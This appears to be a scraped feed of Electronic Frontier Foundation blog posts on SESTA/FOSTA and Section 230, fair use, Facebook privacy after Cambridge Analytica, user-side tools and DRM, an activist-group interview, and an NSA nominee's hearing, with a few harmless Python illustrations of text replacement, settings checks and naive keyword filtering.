Today was a dark day for the Internet.
The U.S. Senate just voted 97-2 to pass the Allow States and Victims to Fight Online Sex Trafficking Act (FOSTA, H.R. 1865), a bill that silences online speech by forcing Internet platforms to censor their users. As lobbyists and members of Congress applaud themselves for enacting a law tackling the problem of trafficking, let’s be clear: Congress just made trafficking victims less safe, not more.
The version of FOSTA that just passed the Senate combined an earlier version of FOSTA (what we call FOSTA 2.0) with the Stop Enabling Sex Traffickers Act (SESTA, S. 1693). The history of SESTA/FOSTA—a bad bill that turned into a worse bill and then was rushed through votes in both houses of Congress—is a story about Congress’ failure to see that its good intentions can result in bad law. It’s a story of Congress’ failure to listen to the constituents who’d be most affected by the laws it passed. It’s also the story of some players in the tech sector choosing to settle for compromises and half-wins that will put ordinary people in danger.

Silencing Internet Users Doesn’t Make Us Safer
SESTA/FOSTA undermines Section 230, the most important law protecting free speech online. Section 230 protects online platforms from liability for some types of speech by their users. Without Section 230, the Internet would look very different. It’s likely that many of today’s online platforms would never have formed or received the investment they needed to grow and scale—the risk of litigation would have simply been too high. Similarly, in absence of Section 230 protections, noncommercial platforms like Wikipedia and the Internet Archive likely wouldn’t have been founded given the high level of legal risk involved with hosting third-party content.
Importantly, Section 230 does not shield platforms from liability under federal criminal law. Section 230 also doesn’t shield platforms across-the-board from liability under civil law: courts have allowed civil claims against online platforms when a platform directly contributed to unlawful speech. Section 230 strikes a careful balance between enabling the pursuit of justice and promoting free speech and innovation online: platforms can be held responsible for their own actions, and can still host user-generated content without fear of broad legal liability.
SESTA/FOSTA upends that balance, opening platforms to new criminal and civil liability at the state and federal levels for their users’ sex trafficking activities. The platform liability created by the new Section 230 carve-outs applies retroactively—meaning the increased liability applies to trafficking that took place before the law passed. The Department of Justice has raised concerns [.pdf] that this violates the Constitution’s Ex Post Facto Clause, at least for the criminal provisions.
The bill also expands existing federal criminal law to target online platforms where sex trafficking content appears. The bill is worded so broadly that it could even be used against platform owners that don’t know that their sites are being used for trafficking.
Finally, SESTA/FOSTA expands federal prostitution law to cover those who use the Internet to “promote or facilitate prostitution.”
It’s easy to see the impact that this ramp-up in liability will have on online speech: facing the risk of ruinous litigation, online platforms will have little choice but to become much more restrictive in what sorts of discussion—and what sorts of users—they allow, censoring innocent people in the process.
What forms that erasure takes will vary from platform to platform. For some, it will mean increasingly restrictive terms of service—banning sexual content, for example, or advertisements for legal escort services. For others, it will mean over-reliance on automated filters to delete borderline posts. No matter what methods platforms use to mitigate their risk, one thing is certain: when platforms choose to err on the side of censorship, marginalized voices are censored disproportionately. The Internet will become a less inclusive place, something that hurts all of us.

Big Tech Companies Don’t Speak for Users
SESTA/FOSTA supporters boast that their bill has the support of the technology community, but it’s worth considering what they mean by “technology.” IBM and Oracle—companies whose business models don’t heavily rely on Section 230—were quick to jump onboard. Next came the Internet Association, a trade association representing the world’s largest Internet companies, companies that will certainly be able to survive SESTA while their smaller competitors struggle to comply with it.
Those tech companies simply don’t speak for the Internet users who will be silenced under the law. And tragically, the people likely to be censored the most are trafficking victims themselves.

SESTA/FOSTA Will Put Trafficking Victims in More Danger
Throughout the SESTA/FOSTA debate, the bills’ proponents provided little to no evidence that increased platform liability would do anything to reduce trafficking. On the other hand, the bills’ opponents have presented a great deal of evidence that shutting down platforms where sexual services are advertised exposes trafficking victims to more danger.
Freedom Network USA—the largest national network of organizations working to reduce trafficking in their communities—spoke out early to express grave concerns [.pdf] that removing sexual ads from the Internet would also remove the best chance trafficking victims had of being found and helped by organizations like theirs as well as law enforcement agencies.
Reforming [Section 230] to include the threat of civil litigation could deter responsible website administrators from trying to identify and report trafficking.
It is important to note that responsible website administration can make trafficking more visible—which can lead to increased identification. There are many cases of victims being identified online—and little doubt that without this platform, they would not have been identified. Internet sites provide a digital footprint that law enforcement can use to investigate trafficking into the sex trade, and to locate trafficking victims. When websites are shut down, the sex trade is pushed underground and sex trafficking victims are forced into even more dangerous circumstances.
Freedom Network was far from alone. Since SESTA was introduced, many experts have chimed in to point out the danger that SESTA would put all sex workers in, including those who are being trafficked. Sex workers themselves have spoken out too, explaining how online platforms have literally saved their lives. Why didn’t Congress bring those experts to its deliberations on SESTA/FOSTA over the past year?
While we can’t speculate on the agendas of the groups behind SESTA, we can study those same groups’ past advocacy work. Given that history, one could be forgiven for thinking that some of these groups see SESTA as a mere stepping stone to banning pornography from the Internet or blurring the legal distinctions between sex work and trafficking.
In all of Congress’ deliberations on SESTA, no one spoke to the experiences of the sex workers that the bill will push off of the Internet and onto the dangerous streets. It wasn’t surprising, then, when the House of Representatives presented its “alternative” bill, one that targeted those communities more directly.

“Compromise” Bill Raises New Civil Liberties Concerns
In December, the House Judiciary Committee unveiled its new revision of FOSTA. FOSTA 2.0 had the same inherent flaw that its predecessor had—attaching more liability to platforms for their users’ speech does nothing to fight the underlying criminal behavior of traffickers.
In a way, FOSTA 2.0 was an improvement: the bill was targeted only at platforms that intentionally facilitated prostitution, and so would affect a narrower swath of the Internet. But the damage it would do was much more blunt: it would expand federal prostitution law such that online platforms would have to take down any posts that could potentially be in support of any sex work, regardless of whether there’s an indication of force or coercion, or whether minors were involved.
FOSTA 2.0 didn’t stop there. It criminalized using the Internet to “promote or facilitate” prostitution. Activists who work to reduce harm in the sex work community—by providing health information, for example, or sharing lists of dangerous clients—were rightly worried that prosecutors would attempt to use this law to put their work in jeopardy.
Regardless, a few holdouts in the tech world believed that their best hope of stopping SESTA was to endorse a censorship bill that would do slightly less damage to the tech industry.
They should have known it was a trap.

SESTA/FOSTA: The Worst of Both Worlds
Thousands of you picked up your phone and called your senators, urging them to oppose the new Frankenstein bill. And you weren’t alone: EFF, the American Civil Liberties Union, the Center for Democracy and Technology, and many other experts pleaded with Congress to recognize the dangers to free speech and online communities that the bill presented.
Even the Department of Justice wrote a letter urging Congress not to go forward with the hybrid bill [.pdf]. The DOJ said that the expansion of federal criminal law in SESTA/FOSTA was simply unnecessary, and could possibly undermine criminal investigations. When the Department of Justice is the group urging Congress not to expand criminal law and Congress does it anyway, something is very wrong.
Assuming that the president signs it into law, SESTA/FOSTA is the most significant rollback to date of the protections for online speech in Section 230. We hope that it’s the last, but it may not be. Over the past year, we’ve seen more calls than ever to create new exceptions to Section 230.
In any case, we will continue to fight back against proposals that undermine our right to speak and gather online. We hope you’ll stand with us.
When a mining company sent a cease and desist letter aimed at a critical documentary, the Southeast Alaska Conservation Council (SEACC) worked with the Electronic Frontier Foundation to help them respond. Hecla Mining Company claimed [PDF] that SEACC had infringed Hecla’s copyright by using short clips from a Hecla promotional video. We worked with SEACC to draft and send a letter [PDF] explaining that this was a classic fair use of Hecla’s material. In response, Hecla withdrew its demand. While this case resolved the right way, it shows that even elementary fair use sometimes requires the counsel of a lawyer.
“Irreparable Harm” is a short film sponsored by SEACC. The movie is about Alaska’s Admiralty Island, a National Monument which has been inhabited by the Tlingit people for thousands of years. In addition to several hundred people living in the Tlingit village of Angoon, the huge island near Juneau is also home to an estimated 2,500 bald eagles, more than 1,000 bears, and one silver mine—Hecla’s Greens Creek Mine.
The documentary explores the mine’s relationship with its Tlingit neighbors, highlighting pollution levels in traditional Tlingit food sources. SEACC says contamination has increased since Greens Creek, the only mine operating within a U.S. National Monument, began production in 1989.
This year, “Irreparable Harm” is screening in cities around the country, including at several environmental film festivals such as the touring Wild & Scenic Film Festival—which apparently didn’t sit too well with Hecla Mining Company. Instead of offering a substantive response to the film, Hecla hired big-city lawyers in an attempt to shut down the movie with a spurious copyright claim against the nine-person grassroots environmental organization from Juneau.
In a letter sent last month, Hecla claimed that SEACC’s use of footage from a company promotional video about Greens Creek violated the Copyright Act. Ignoring SEACC’s fair use rights, the letter goes on to demand that SEACC “cease any and all reproduction of Hecla’s copyrighted works, including but not limited to, any showings of the Irreparable Harm film.”
EFF responded to Hecla’s demands on behalf of SEACC. We pointed out what should have been obvious—that the use of short clips in a critical documentary is “a paradigmatic case of fair use.” SEACC used just 28 seconds of footage from Hecla’s promotional video, combining it with voice-over commentary on Hecla’s mining practices.
Hecla has since backed off, stating [PDF] that it has “decided not to take further action” at this time. We’re glad that we were able to help SEACC in this case. But filmmakers shouldn’t have to hire a lawyer to protect their fundamental right to free expression. Copyright is meant to spur the production of new works, but unfortunately, it’s all too easy to use it as a tool of censorship (in this case we might call it a Hecla’s Veto).
Don’t let the potential of a copyright threat squelch your speech. For those seeking guidance on future projects, the Association of Independent Video and Filmmakers has a “best practices” guide to fair use, and is a veritable “silver mine” of information.
To schedule a viewing of SEACC’s film or find one near you, contact the organization directly at email@example.com.
Last weekend’s Cambridge Analytica news—that the company was able to access tens of millions of users’ data by paying low-wage workers on Amazon’s Mechanical Turk to take a Facebook survey, which gave Cambridge Analytica access to Facebook’s dossier on each of those turkers’ Facebook friends—hammered home two problems. First, Facebook’s default privacy settings are woefully inadequate to the task of really protecting user privacy. Second, ticking the right boxes to make Facebook less creepy is far too complicated. Unfortunately for Facebook, regulators in the U.S. and around the world are looking for solutions, and fast.
But there’s a third problem, one that platforms and regulators themselves helped create: the plethora of legal and technical barriers that make it hard for third parties—companies, individual programmers, free software collectives—to give users tools that would help them take control of the technologies they use.
Think of an ad-blocker: you view the web through your browser, and so you get to tell your web-browser which parts of a website you want to see and which parts you want to ignore. You can install plugins to do trivial things, like replace the word “millennials” with “snake people”—and profound things, like making the web readable by people with visual impairments.
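The “snake people” swap is about the simplest content transformation a plugin can make: rewrite the text of a page before you read it. As a rough illustration of that core logic, here is a sketch in Python (the real extension runs JavaScript inside the browser, but the transform itself is the same idea):

```python
import re

def snakeify(page_text: str) -> str:
    """Replace 'millennials' with 'snake people', preserving capitalization.

    This is the kind of text transform a browser plugin applies to each
    text node of a page; a real extension wraps logic like this in a
    content script that runs as the page loads.
    """
    def swap(match: re.Match) -> str:
        word = match.group(0)
        return "Snake People" if word[0].isupper() else "snake people"

    return re.sub(r"[Mm]illennials", swap, page_text)

print(snakeify("Millennials love avocado toast, say millennials."))
# → Snake People love avocado toast, say snake people.
```

The point is not the joke but the control: the same few lines of logic, pointed at ads, trackers, or unreadable fonts, let the user decide what the browser renders.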
Ad-blockers are nearly as old as the web. In the early days of the web, they broke the deadlock over pop-up ads, allowing users to shape their online experience directly; pop-ups died off as advertisers realized that serving one all but guaranteed no one would see the ad. We—the users—decided what our computers would show us, and businesses had to respond.
Web pioneer Doc Searls calls the current generation of ad-blockers “the largest consumer revolt in history.” The users of technology have availed themselves of the tools to give them the web they want, not the web that corporations wanted us to have. The corporations that survive this revolt will be the ones who can deliver services that users are willing to use without add-ons that challenge their business-models.
In his 1999 classic Code and Other Laws of Cyberspace, Lawrence Lessig argued that our world is regulated by four forces:
- Law: what's legal
- Markets: what's profitable
- Norms: what's morally acceptable
- Code: what's technologically possible
Under ideal conditions, companies that do bad things with technology are shamed and embarrassed by bad press (norms); they face lawsuits and regulatory action (law); they lose customers and their share-price dips (markets); and then toolsmiths make add-ons for their product that allow us all to use them safely, without giving up our personal information, or being locked into their software store, or having to get repairs or consumables from the manufacturer at any price (code).
But an increasing slice of the web is off-limits to the “code” response to bad behavior. When a programmer at Facebook makes a tool that allows the company to harvest the personal information of everyone who visits a page with a “Like” button on it, another programmer can write a browser plugin that blocks this button on the pages you visit.
This week, we made you a tutorial explaining the torturous process by which you can change your Facebook preferences to keep the company’s “partners” from seeing all your friends’ data. But what many folks would really like to do is give you a tool that does it for you: go through the tedious work of figuring out Facebook’s inscrutable privacy dashboard, and roll that expertise up in a self-executing recipe—a piece of computer code that autopiloted your browser to login to Facebook on your behalf and ticked all the right boxes for you, with no need for you to do the fiddly work.
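The computation half of such a recipe is not technically hard. Here is a toy sketch in Python, with entirely hypothetical setting names (Facebook publishes no such API): given the current state of a privacy dashboard, work out which boxes differ from a set of safe defaults. A real tool would also need a browser-automation layer to log in and click each of them for you.

```python
# A toy model of a privacy-hardening "recipe". The setting names below are
# hypothetical illustrations, not Facebook's real dashboard options.
SAFE_DEFAULTS = {
    "apps_others_use_can_see_bio": False,
    "apps_others_use_can_see_birthday": False,
    "platform_apps_enabled": False,
}

def boxes_to_toggle(current_settings: dict) -> list:
    """Return the settings whose current value differs from the safe default.

    A browser-automation layer would then flip each of these on the
    user's behalf, sparing them the fiddly work.
    """
    return sorted(
        name
        for name, safe_value in SAFE_DEFAULTS.items()
        # Missing settings are assumed to sit at the permissive default.
        if current_settings.get(name, not safe_value) != safe_value
    )

# Example: a user who has left everything at the permissive defaults.
print(boxes_to_toggle({"platform_apps_enabled": True}))
```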
But they can’t. Not without risking serious legal consequences, at least. A series of court decisions—often stemming from the online gaming world, sometimes about Facebook itself—has made fielding code that fights for the user into a legal risk that all too few programmers are willing to take.
That's a serious problem. Programmers can swiftly make tools that allow us to express our moral preferences, allowing us to push back against bad behavior long before any government official can be convinced to take an interest—and if your government never takes an interest, or if you are worried about the government's use of technology to interfere in your life, you can still push back, with the right code.
Today, we are living through a “techlash” in which the world has woken up to realize that a single programmer can make choices that affect millions—billions—of people’s lives. America’s top computer science degree programs are making ethics an integral part of their curriculum. The ethical epiphanies of geeks have profoundly shaped the way we understand our technology (if only all technologists were so concerned with the ethics of their jobs).
We need technologists to thoughtfully communicate technical nuance to lawmakers; to run businesses that help people master their technology; to passionately make the case for better technology design.
But we also need our technologists to retain the power to affect millions of lives for the better. Skilled toolsmiths can automate the process of suing Equifax, filing for housing aid after you’re evicted, fighting a parking ticket or forcing an airline to give you a refund if your ticket’s price drops after you buy it (and that’s all just one programmer, and he hasn’t even graduated yet!).
When we talk about “walled gardens,” we focus on the obvious harms: an App Store makes one company the judge, jury and executioner of whose programs you can run on your computer; apps can’t be linked into and disappear from our references; platforms get to spy on you when you use them; opaque algorithms decide what you hear (and thus who gets to be heard).
But more profoundly, the past decade’s march to walled gardens has limited what we can do about all these things. We still have ad-blockers (but not for “premium video” anymore, because writing an ad-blocker that bypasses DRM is a potential felony), but we can’t avail ourselves of tools to auto-configure our privacy dashboards, or snoop on our media players to see if they’re snooping on us, or any of a thousand other useful and cunning improvements over our technologically mediated lives.
Because in the end, the real risk of a walled garden isn’t how badly it can treat us: it’s how helpless we are to fight back against it with our own, better code. If you want to rein in Big Tech, it would help immensely to have lots of little tech in use showing how things might be if the giants behaved themselves. If you want your friends to stop selling their private information for a mess of potage, it would help if you could show them how to have an online social life without surrendering their privacy. If you want the people who bet big on the surveillance business-model to go broke, there is no better way to punish them in the marketplace than by turning off the data-spigot with tools that undo every nasty default they set in the hopes that we'll give up and use products their way, not ours.

Related Cases: Facebook v. Power Ventures; Blizzard v. BNETD
You shouldn't have to do this. You shouldn't have to wade through complicated privacy settings in order to ensure that the companies with which you've entrusted your personal information are making reasonable, legal efforts to protect it. But Facebook has allowed third parties to violate user privacy on an unprecedented scale, and, while legislators and regulators scramble to understand the implications and put limits in place, users are left with the responsibility to make sure their profiles are properly configured.
Over the weekend, it became clear that Cambridge Analytica, a data analytics company, got access to more than 50 million Facebook users' data in 2014. The data was overwhelmingly collected, shared, and stored without user consent. The scale of this violation of user privacy reflects how Facebook's terms of service and API were structured at the time. Make no mistake: this was not a data breach. This was exactly how Facebook's infrastructure was designed to work.
In addition to raising questions about Facebook's role in the 2016 presidential election, this news is a reminder of the inevitable privacy risks that users face when their personal information is captured, analyzed, indefinitely stored, and shared by a constellation of data brokers, marketers, and social media companies.
Tech companies can and should do more to protect users, including giving users far more control over what data is collected and how that data is used. That starts with meaningful transparency and allowing truly independent researchers—with no bottom line or corporate interest—access to work with, black-box test, and audit their systems. Finally, users need to be able to leave when a platform isn’t serving them — and take their data with them when they do.
Of course, you could choose to leave Facebook entirely, but for many that is not a viable solution, unfortunately. For now, if you'd like to keep your data from going through Facebook's API, you can take control of your privacy settings. Keep in mind that this disables ALL platform apps (like Farmville, Twitter, or Instagram) and you will not be able to log into sites using your Facebook login.
Log into Facebook and visit the App Settings page (or go there manually via the Settings Menu > Apps ).
From there, click the "Edit" button under "Apps, Websites and Plugins." Click "Disable Platform."
If disabling platform entirely is too much, there is another setting that can help: limiting the personal information accessible by apps that others use. By default, other people who can see your info can bring it with them when they use apps, and your info becomes available to those apps. You can limit this as follows.
From the same page, click "Edit" under "Apps Others Use." Then uncheck the types of information that you don't want others' apps to be able to access. For most people reading this post, that will mean unchecking every category.
Savvy parents know that every cloud-connected electronic gadget they buy for their kids is a potential hole in their network, a sneaky listening device that hangs around some of the most sensitive and personal moments of your kids' lives and the lives of your whole family. But tomorrow's smart parents know that those toys are a potential platform for innovation, places where parents, programmers and businesses can work to create new operating systems that never talk to the cloud, and that replace the canned messages of a distant corporate design department with material of your own choosing.
Here at the Electronic Frontier Alliance, we’re lucky to have incredible member organizations engaging in advocacy on our issues across the U.S. One of those groups in Chicago, Lucy Parsons Labs (LPL), has done incredible work taking on a range of civil liberties issues. They’re a dedicated group of advocates volunteering to make their world (and the Windy City) a better, more equitable place.
We sat down with one of the founders of LPL, Freddy Martinez, to gain a better understanding of the Lab and how they use their collective powers for good.
How would you describe Lucy Parsons Labs? How did the organization get started, and what need were you trying to fill?
The lab got started four years back when a few people doing digital security training in Chicago saw a need for a more technical group that could bridge the gap between advocacy and technology. We each had areas of interest and expertise that we were doing activism around, and it grew pretty organically from there. For example, lawmakers would try to pass a bill without fully understanding the implications that the piece of legislation would have, technologically or otherwise. We began to work together on these projects to educate lawmakers and inform the public on these issues as a friend group, and the organization grew out of that as we added or expanded projects. We do a lot of public records requests and work on police transparency, but our group has broad, varied interests. The common thread that runs through the work is that we have a lot of expertise in a lot of different advocacy areas, and we leverage that expertise to make the world better. It lets us sail in many different waters.
LPL participates in the Electronic Frontier Alliance (EFA), a network of grassroots digital rights groups around the country. Your work in Chicago runs the gamut from advocating for transparency in the criminal justice system, to investigating civil asset forfeiture, to operating a SecureDrop system for whistleblowers, to investigating the use of cell-site simulators by the Chicago Police Department. Given that, how does the EFA play into your work?
I feel that the more the organization grows, the more having groups around the country who are building capacity is key to making sure that these projects get done. There’s such a huge amount of work to be done, and having other partners who are interested in various subsections of our work and can help us achieve our goals is really valuable. EFA provides us access to a diverse array of experts, from academics and lawyers to grassroots activists. It gives us a lot of leverage, and lets us share our subject matter expertise in ways we wouldn’t be able to if we were going it alone.
Let’s talk surveillance. LPL has done incredible work via the open records process to expose the use of cell-site simulators (sometimes referred to as “Stingrays” or IMSI Catchers) by the Chicago Police Department. Can you tell us about how you started investigating, and why these kinds of surveillance need to be brought into the public conversation?
I actually heard of this equipment through news reporting—you would see major cities buying these devices, and then troubling patterns began to emerge. Prosecutors would begin dropping cases because they didn’t want to tell defense attorneys where they got the information or how. There were cases of parallel construction. After noticing this trend, I sent my first public records request to get info on whether the Chicago Police Department had bought any. Instead of following the law, they decided to ignore the request until a judge ordered them to release the records. They were ostensibly used for the war on drugs, but usually they are used overseas in the war on terror. They test these technologies on black and brown populations in war zones, then bring them back to surveil their citizens. It’s an abuse of power and an invasion of privacy. We need to be talking about this. We think that there’s a reason that this stuff is acquired in secret, because people would not be okay with their government doing this if they knew.
LPL has done tons of community work in the anti-surveillance realm as well. Why do you believe educating people about how they can protect themselves from surveillance is important?
I think that you need to give people the breathing room to participate in society safely. Surveillance is usually thought of as an eye in the sky watching over your every move, but it’s so much more pervasive than that. We think about these things in abstract ways, with very little understanding of how they can affect our daily lives. A way to frame the importance of, say, encryption, is to use the example of medical correspondence. If you’re talking to your doctor, you don’t want your messages to be seen by anyone else. It’s critical to have these discussions and decisions made in public so that people can make informed decisions about their lives and privacy. This is a broader responsibility we have as a society, and to each other.
Do you have any advice for other community-based advocacy groups based on your experience?
I have found that being organized is extremely important. We’re a small team of volunteers, so we have to keep things really well documented, especially when dealing with something like public records requests. You also have to, and I can’t stress this enough, enjoy the work and make sure you don’t burn out. It’s a labor of love—you need to be invested in these projects and taking care of yourself in order to do effective activism. Otherwise the work will suffer.
LPL has partnered with other organizations and community groups in the past. What are some ways that you’ve found success in coalition building? What advice would you give to other groups that would like to work more collaboratively with their peer groups?
LPL is also part of a larger group called the Chicago Data Collaborative, where we are working on sharing and analyzing data on the criminal justice system. One of the most important pieces of information to know before embarking on a multi-organization enterprise is that you will have to do a lot of capacity building in order to work together effectively. You’ll need to set aside a lot of time and effort to build context for those not in the know. You must be “in the room” (whether that’s digital or physical) for dedicated, direct collaboration. This is what makes or breaks a good partnership.
Anything else you’d like to add?
I have a bit of advice for people who’d like to get involved in grassroots activism and advocacy, but aren’t sure where to start: you never know when you’re going to come across these projects. Get started somewhere, stay curious, and follow your gut. It will take you down weird rabbit holes, and you’ll be surprised how far it takes you.
This interview has been lightly edited for length and readability.
Lt. Gen. Paul Nakasone, the new nominee to direct the NSA, faced questions Thursday from the Senate Select Committee on Intelligence about how he would lead the spy agency. One committee member, Senator Ron Wyden (D-OR), asked the nominee if he and his agency could avoid the mistakes of the past, and refuse to participate in any new, proposed spying programs that would skirt the law and violate Americans’ constitutional rights.
“In 2001, then-President Bush directed the NSA to conduct an illegal, warrantless wiretapping program. Neither the public nor the full intelligence committee learned about this program until it was revealed in the press,” Wyden said. Wyden, who was a member of the committee in 2001, said he personally learned about the NSA surveillance program—which bypassed judicial review required from the Foreign Intelligence Surveillance Court—by reading about it in the newspaper. Sen. Wyden continued:
“If there was a form of surveillance that currently requires approval by the [Foreign Intelligence Surveillance Court] and you were asked to avoid the court, based on some kind of secret legal analysis, what would you do?”
Lt. Gen. Nakasone deferred, assuring Sen. Wyden that he would receive a “tremendous amount of legal advice” in his new job, if confirmed.
Sen. Wyden interrupted: “Let me just stop it right there, so I can learn something that didn’t take place before. You would, if asked, tell the entire committee that you had been asked to [review such a program]?”
“Senator,” Lt. Gen. Nakasone responded, “I would say that I would consult with the committee—”
“When you say consult,” Wyden interrupted again, “you would inform us that you had been asked to do this?”
Lt. Gen. Nakasone repeated himself: he would consult with the committee, and keep senators involved in such discussions. Lt. Gen. Nakasone added, though, that “at the end of the day, Senator, I would say that there are two things I would do. I would follow the law, and I would ensure, if confirmed, that the agency follows the law.”
Sen. Wyden took it as a win.
“First of all, that’s encouraging,” Wyden said, “because that was not the case back in 2001.”
“In 2001, the President said we’re going to operate a program that clearly was illegal. Illegal! You’ve told us now, you’re not going to do anything illegal. That’s a plus. And you told us that you would consult with us if you were ever asked to do something like that. So, I appreciate your answer.”
Sen. Wyden also asked Lt. Gen. Nakasone about encryption: did he agree with encryption experts that, if tech companies were required to “permit law enforcement access to Americans’ private communications and data,” then such access could be exploited by “sophisticated, foreign government hackers,” too?
Again, Lt. Gen. Nakasone avoided a direct yes or no answer, and again, Sen. Wyden interrupted.
“My time is up, general. Just a yes-or-no answer to the question, with respect to what experts are saying,” Wyden said. “Experts are saying that the tech companies can’t modify their encryption to permit law enforcement access to Americans’ private communications without the bad guys getting in, too. Do you disagree with the experts, that’s just a yes or no.”
“I would offer, Senator,” Lt. Gen. Nakasone said, “that it’s a conditional yes.”
Wyden, a staunch encryption advocate in the Senate, interpreted Lt. Gen. Nakasone’s answer positively. “That’s encouraging as well,” Wyden said. “I look forward to working with you in the days ahead.”
Senate Intelligence Committee Chairman Richard Burr (R-NC), at the close of the hearing, said he would like to move Lt. Gen. Nakasone’s nomination forward swiftly. If other Senators have the opportunity to question Lt. Gen. Nakasone about his potential leadership of the NSA, we hope they ask pointed, necessary questions about the agency’s still-ongoing surveillance under Section 702, and how the nominee plans to reconcile that widespread, invasive spying program with Americans’ constitutional right to privacy.
Some of the biggest names in the U.S. entertainment industry have expressed a recent interest in a topic that’s seemingly far away from their core business: shutting down online prostitution. Disney, for instance, recently wrote to key U.S. senators expressing its support for SESTA, a bill that was originally aimed at sex traffickers. For its part, 20th Century Fox told the same senators that anyone doing business online “has a civic responsibility to help stem illicit and illegal activity.”
Late last year, the bill the entertainment companies supported morphed from SESTA into FOSTA, and then into a kind of Frankenstein bill that combines the worst aspects of both. The bill still does nothing to catch or punish traffickers, or provide help to victims of sex trafficking.
As noted by Freedom Network USA, the largest coalition of organizations working to fight human trafficking, law enforcement already has the ability to go after sex traffickers and anyone who helps them. Responsible web operators can help in that task. The civil liabilities imposed by FOSTA could actually harm the hunt for perpetrators.
Freedom Network suggests the better approach would be to provide services and support to victims, but that’s not what FOSTA does. What it does do is offer a powerful incentive for online platforms to police the speech of users and advertisers. A perceived violation of a state’s anti-trafficking laws could lead to authorities seeking civil or criminal penalties, or a barrage of lawsuits.
So, why are movie studios involved at all in this debate? Hollywood is lobbying for laws that will force online intermediaries to shut down user speech. That’s what they’ve been seeking since practically the beginning of the Internet.

A Brief History of Safe Harbors
The Internet as we know it is underpinned by two critical laws that have allowed user speech to blossom: Section 230 of the Communications Decency Act, and 17 U.S. Code § 512, which outlines the “safe harbor” provisions of the Digital Millennium Copyright Act, or DMCA.
Section 230 prevents online platforms from being held liable, in many cases, for their users’ speech. Platforms are free to moderate speech in a way that works for them—removing spam or trolling comments, for instance—without being compelled to read each comment, or view each video, a task that’s simply impossible on sites with thousands or millions of users.
Similarly, the DMCA safe harbor shields the same service providers from copyright damages based on user infringement, as long as they follow certain guidelines. The two laws work together to send a clear message: in the online world, users are responsible for their own actions and speech, and online platforms can mediate that speech—or not—as fits the needs of their community.
For two decades now, Section 230 and the DMCA have complemented each other, allowing for an explosion of online creativity. Without the DMCA safe harbor, small businesses could face bankruptcy over the copyright infringement of a few users. And without Section 230, the same businesses could be sued for a vast array of user misbehavior that they didn’t even know about. Lawsuits for libel or invasion of privacy, for instance, could be aimed at the platform, rather than the person who actually committed those acts.
Without these key legal protections, many sites would make the safe choice and simply choose to not host free and unfettered discussions. Others might begin to police user content overzealously, removing or blocking lots of lawful speech for fear of letting something illegal slip through. The safe harbors keep the focus for any online wrongdoing on the actual wrongdoer, whether it’s a civil violation like copyright infringement, or criminal acts.
It’s hardly a free-for-all for the companies protected by the safe harbors, which have significant limits. Online platforms that edit or direct user speech that violates the law, for instance, can’t avail themselves of Section 230 protections. It’s fine to run online advertisements, but sites that help users post ads for illegal or discriminatory content can be, and have been, held accountable.
Section 230 doesn’t offer any shield against federal criminal law, and one doesn’t have to look far to find website operators that have been punished under those laws. The operator of the online marketplace Silk Road, for instance, was convicted of federal drug trafficking offenses.
Nor does protection accrue to websites that make contributions, even small ones, to illegal content. An online housing website, Roommates.com, lost Section 230 protection simply because it required users to answer questions that could be used in housing discrimination. While EFF has long expressed concerns about the free speech implications of the 2008 Fair Housing Council v. Roommates.com decision, it remains the law and demonstrates that Section 230 is far from a free pass.
Likewise, the DMCA safe harbors only apply if an online platform complies with numerous requirements, including implementing a repeat-infringer policy and responding to notices of infringement by taking down content.

Towards a Filtered Net?
For legacy software and entertainment companies, breaking down the safe harbors is another road to a controlled, filtered Internet—one that looks a lot like cable television. Without safe harbors, the Internet will be a poorer place—less free for new ideas and new business models. That suits some of the gatekeepers of the pre-Internet era just fine.
The not-so-secret goal of SESTA and FOSTA is made even clearer in a letter from Oracle. “Any start-up has access to low cost and virtually unlimited computing power and to advanced analytics, artificial intelligence and filtering software,” wrote Oracle Senior VP Kenneth Glueck. In his view, Internet companies shouldn’t “blindly run platforms with no control of the content.”
That comment helps explain why we’re seeing support for FOSTA and SESTA from odd corners of the economy: some companies will prosper if online speech is subject to tight control. An Internet that’s policed by “copyright bots” is what major film studios and record labels have advocated for more than a decade now. Algorithms and artificial intelligence have made major advances in recent years, and some content companies have used those advances as part of a push for mandatory, proactive filters. That’s what they mean by phrases like “notice-and-stay-down,” and that’s what messages like the Oracle letter are really all about.
Software filters can provide a useful first take in moderating content, but they need proper supervision from humans. Bots still can’t determine when use of copyrighted material is fair use, for instance, which is why a best practice is to always let human creators dispute the determination of an automated filter.
Similarly, it’s unlikely that an automated filter will be able to determine the nuanced difference between actual online sex-trafficking and a discussion about sex-trafficking. Knocking down safe harbors will lead to an over-reliance on flawed filters, which can easily silence the wrong people.
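The weakness of purely automated moderation is easy to demonstrate. The minimal sketch below (the blocklist, function name, and example posts are all invented for illustration, not drawn from any real filtering product) shows why keyword matching flags a news report or a survivor’s account just as readily as an illicit ad: the filter matches words, not meaning.

```python
# A deliberately naive keyword filter, illustrating why automated
# moderation produces false positives: it matches words, not context.
BLOCKLIST = {"trafficking", "escort"}

def flag(post: str) -> bool:
    """Return True if the post contains any blocklisted keyword."""
    words = post.lower().split()
    return any(term in words for term in BLOCKLIST)

# A news story and a survivor's warning trip the filter exactly
# as an illicit ad would -- the filter cannot tell them apart.
news_story = "new study examines how trafficking victims find help online"
victim_forum = "i escaped trafficking and want to warn others"

print(flag(news_story))   # True: lawful speech, flagged anyway
print(flag(victim_forum)) # True: the very people the law claims to protect
```

Real filters are more sophisticated than this, but the underlying problem is the same: no amount of pattern matching substitutes for human judgment about context.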
Those filters would create a huge barrier to entry for startups, non-profits, and hobbyists. And at the end of the day, they’d hurt free speech. Claiming that new technology can produce a reliable filter is a fallacy: bots simply can’t judge fair use.
So when Hollywood and entrenched tech interests suddenly take a new interest in the problem of sex trafficking, it’s fair to wonder why. After all, an Internet subject to corporate filters will make it harder, not easier, to hunt down and prosecute sex traffickers.
Punching a hole in safe harbors to reshape the Internet has been the project, in many different forms, for more than a decade now. The FOSTA bill, if it passes the Senate, will be the first major success in dismantling a safe harbor. But don’t count on it to be the last.
Stop SESTA and FOSTA
Visit The Catalog of Missing Devices, a collection of tools, services, and products that could have been, but never were, because of DRM.
For the most part, rightsholders don't object to user-created subtitling, which is key to making videos available to non-native speakers of the media's original language, and accessible to people with hearing disabilities. Fansubbing and similar practices predate internet videos by decades, but creating a crowdsourced subtitling tool becomes a potential felony once DRM gets in the picture, if the DRM has to be bypassed to get the subtitles in.
